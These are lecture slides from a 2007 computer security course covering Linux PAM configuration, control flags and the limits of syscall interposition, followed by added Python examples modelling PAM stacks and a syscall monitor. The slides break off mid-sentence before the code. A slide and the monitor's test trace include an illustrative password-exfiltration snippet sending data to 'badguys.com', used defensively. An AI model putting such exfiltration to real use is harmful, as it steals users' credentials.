CSE543 Computer (and Network) Security - Fall 2007 - Professor Jaeger
CSE 543 - Computer Security
Lecture 15 - Linux Security
October 18, 2007
URL: http://www.cse.psu.edu/~tjaeger/cse543-f07/

Retrofit Security in Existing Systems
• Upside
  • Operating systems are costly to build from scratch
    • Hundreds of millions of dollars
  • Some become popular
    • Already lots of applications
    • A user community
• Downside
  • “Design for security”
  • Will applications still work?
  • Is this better than building a new system?

Retrofitted Systems
• Lots of examples
• Originally, tried to run commercial systems emulated on secure systems
  • Performance was terrible
• Retrofitted
  • VAX/VMS
  • IBM VM/370
  • Mach Microkernel
  • Other Microkernels
  • Various UNIX Systems
    • Trusted Solaris is the main success

Linux Security
• Build a protection system for Linux
  • Bottom-up from a variety of services
• Reference monitor
  • Linux Security Modules framework
  • Provides interface for externally-defined reference monitors (LSMs)
  • Examples: AppArmor and SELinux
• Protection states and administration
  • LSMs define mandatory protection state
  • Services to build, modify, and install
• Pluggable Authentication Modules (PAM) authenticate clients

Pluggable Authentication Modules
• Centralized authentication service for Linux/Solaris
• Advantages
  • Provides a common authentication scheme that can be used with a wide variety of applications.
  • Allows a large amount of flexibility and control over authentication for both the system administrator and application developer.
  • Allows application developers to develop programs without creating their own authentication scheme.
• PAM-ified application
  • Uses PAM authentication technique and configuration
  • Receives identity
  • May be entrusted to forward identity to reference monitor

PAM Authentication
• Authentication Architecture
[Figure: remote client, operating system and local application each authenticate through their own PAM instance]

Pluggable Authentication Modules
• Config files: /etc/pam.d/
  • For each PAMified application
  • su -- /etc/pam.d/su or /etc/pam.conf
• Line format: <module interface> <control flag> <module path> <module arguments>

    #%PAM-1.0
    auth       required   /lib/security/$ISA/pam_stack.so service=system-auth
    account    required   /lib/security/$ISA/pam_stack.so service=system-auth
    password   required   /lib/security/$ISA/pam_stack.so service=system-auth
    session    required   /lib/security/$ISA/pam_stack.so service=system-auth
    session    optional   /lib/security/$ISA/pam_xauth.so

PAM Concepts
• Module Interface
  • Auth: authentication
  • Account: management + authorization
    • Use service; password expire
  • Password: set and verify passwords
  • Session: configure session
    • E.g., mount home directory
• One module may provide all
  • pam_stack.so for each newrole interface
• Modules may be ‘stacked’
  • Multiple modules support the same interface
  • Required and optional modules on the session interface

pam_unix.so
• Auth
  • Authentication
  • pam_authenticate() and pam_setcred() (RPC credentials)
• Session
  • Session logging
• Account
  • Check that password has not expired
• Password
  • Password update, includes cracklib to check strength

Control Flags
• Required
  • Must be successful
  • Notify after all modules on interface run
• Requisite
  • Must be successful
  • Notify immediately
• Sufficient
  • Result is ignored if failed
  • Pass if succeeds and no previous modules failed
• Optional
  • Result is ignored
  • Must pass if no other modules

PAM Usage
• PAMify an application
  • Must be able to modify the application code
  • Build with PAM libraries (libpam, libpam-misc, ...)
• Authenticate first
  • Build pam_handle_t data structure
  • Call pam_authenticate (calls PAM module for authenticate)
  • Use pam_get_item to get authenticated identity
• Example
  • Call pam_authenticate (uses module specified in config)
  • PAM gets username, password (or whatever)
  • Returns PAM_SUCCESS
  • Use pam_get_item to get the actual identity

PAM Usage (cont’d)
• Session management
  • pam_setcred() before open session
    • application-specific credentials to PAM
  • pam_open_session()
  • pam_close_session()
    • based on module specified in config
• Account management
  • pam_acct_mgmt()
    • based on module specified in config
• Password
  • pam_chauthtok()
    • based on module specified in config
• Q: Where is responsibility for correct authentication?

Retrofitting Reference Monitors …
• Syscall interposition
  • Argument: all harm comes to system through system calls. Hence, if you regulate their use, you can implement policy.
  • Systrace: system for obtaining traces of system calls and ultimately defining a policy (ACLs, more or less).
  • Bluebox: does largely the same thing, but allows you to define more abstract policy.
[Figure: a user-space loop, for (i = 0; i < 10; i++) { z += i; y = y/k; print “z y\n”; z = 0; }, issuing calls across the syscall interface; the syscall interposition layer sits between user space and kernel space]

Problems with syscall interposition …
• You have to expose all the semantics in the single enforcement layer
  • For example, think about the execve() system call
  • A “/bin/echo” parameter leads to very different behavior than “/bin/sh”; this is what buffer-overflow attacks exploit
• You often need to duplicate a lot of state in enforcing some reasonable policies. Consider

    int sock = connect( “badguys.com” );
    …
    send( sock, &yourpasswordbuffer );

  • Little you can do unless you keep track of the relationship between sock and “badguys.com”

Linus’ Directive
• Following a presentation of SELinux to the
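The /etc/pam.d line format and the control-flag rules from the Control Flags slide, worked through as an added Python example (not course material or Linux-PAM code). The su stack is the one on the slide; the second auth stack and the module outcomes are constructed for the demonstration, and the parser takes only the four control flags named on the slide:

```python
from typing import Callable, List, NamedTuple

class PamEntry(NamedTuple):
    interface: str   # auth | account | password | session
    control: str     # required | requisite | sufficient | optional
    module: str      # module path, e.g. /lib/security/$ISA/pam_stack.so
    args: List[str]  # module arguments, e.g. ["service=system-auth"]

def parse_pam_config(text: str) -> List[PamEntry]:
    """Parse '<interface> <control flag> <module path> <args...>' lines;
    blank lines and comments such as the #%PAM-1.0 header are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 3 or parts[1] not in ("required", "requisite", "sufficient", "optional"):
            raise ValueError(f"malformed PAM line: {raw!r}")
        entries.append(PamEntry(parts[0], parts[1], parts[2], parts[3:]))
    return entries

def run_stack(entries: List[PamEntry], interface: str,
              outcome: Callable[[str], bool]) -> bool:
    """Apply the control flags to the modules stacked on one interface.
    outcome(module_path) stands in for calling the module; True == PAM_SUCCESS."""
    stack = [e for e in entries if e.interface == interface]
    required_failed, last = False, False
    for e in stack:
        last = outcome(e.module)
        if e.control == "requisite" and not last:
            return False              # must succeed; failure reported immediately
        if e.control == "required" and not last:
            required_failed = True    # must succeed; reported after the whole stack
        if e.control == "sufficient" and last and not required_failed:
            return True               # enough; the remaining modules are skipped
        # optional: result ignored unless it is the only module on the interface
    if len(stack) == 1 and stack[0].control == "optional":
        return last
    return bool(stack) and not required_failed   # empty stack: fail closed

# The su stack from the slide, plus a constructed auth stack with requisite
# and sufficient entries (module names are real Linux-PAM modules).
SU_CONFIG = """#%PAM-1.0
auth     required /lib/security/$ISA/pam_stack.so service=system-auth
account  required /lib/security/$ISA/pam_stack.so service=system-auth
password required /lib/security/$ISA/pam_stack.so service=system-auth
session  required /lib/security/$ISA/pam_stack.so service=system-auth
session  optional /lib/security/$ISA/pam_xauth.so"""
DEMO_AUTH = "auth requisite pam_securetty.so\nauth sufficient pam_unix.so\nauth required pam_deny.so"
```

A failing optional pam_xauth.so leaves the su session stack passing, while in the constructed stack a successful sufficient pam_unix.so ends evaluation before pam_deny.so runs, which is exactly the ordering a reviewer of a PAM file has to read.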
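The two problems on the last slide, execve() semantics living in the argument and send() being undecidable without state from the earlier connect(), modelled as an added Python toy (not Systrace or Bluebox code). The trace format, the host names and the fd numbers are constructed; the monitor deliberately lets connect() through so the send() decision has to come from remembered state:

```python
from typing import Dict, List, Tuple

class Monitor:
    """Interposition layer that sees each syscall before the kernel does and
    answers allow (True) or deny (False).  sock_host is kernel state the
    monitor has to duplicate just to judge a later send() at all."""

    def __init__(self, allowed_exec: set, blocked_hosts: set):
        self.allowed_exec = allowed_exec
        self.blocked_hosts = blocked_hosts
        self.sock_host: Dict[int, str] = {}   # fd -> peer, learned from connect()

    def check(self, name: str, args: tuple) -> bool:
        if name == "execve":
            # Same syscall, very different behaviour: the decision must be
            # made on the path argument, not on the syscall number.
            return args[0] in self.allowed_exec
        if name == "connect":
            fd, host = args
            self.sock_host[fd] = host   # allowed here; remember the peer
            return True
        if name == "close":
            self.sock_host.pop(args[0], None)   # fd numbers get reused
            return True
        if name == "send":
            host = self.sock_host.get(args[0])
            # The bytes alone say nothing about where they go; a socket never
            # seen in connect() is judged fail-closed.
            return host is not None and host not in self.blocked_hosts
        return True   # calls this toy policy does not regulate

def run_trace(monitor: Monitor, trace: List[Tuple[str, tuple]]) -> List[bool]:
    """Feed a recorded syscall trace (Systrace-style) through the monitor."""
    return [monitor.check(name, args) for name, args in trace]

# Constructed trace following the slide's snippet; hosts and fds are made up.
TRACE = [
    ("connect", (3, "badguys.com")),
    ("send", (3, b"yourpasswordbuffer")),  # only decidable via the connect() above
    ("close", (3,)),
    ("connect", (3, "mail.example.org")),  # fd 3 reused for a different peer
    ("send", (3, b"hello")),
    ("execve", ("/bin/echo",)),
    ("execve", ("/bin/sh",)),
    ("send", (7, b"data")),                # never connected through the monitor
]

def demo() -> List[bool]:
    m = Monitor(allowed_exec={"/bin/echo"}, blocked_hosts={"badguys.com"})
    return run_trace(m, TRACE)
```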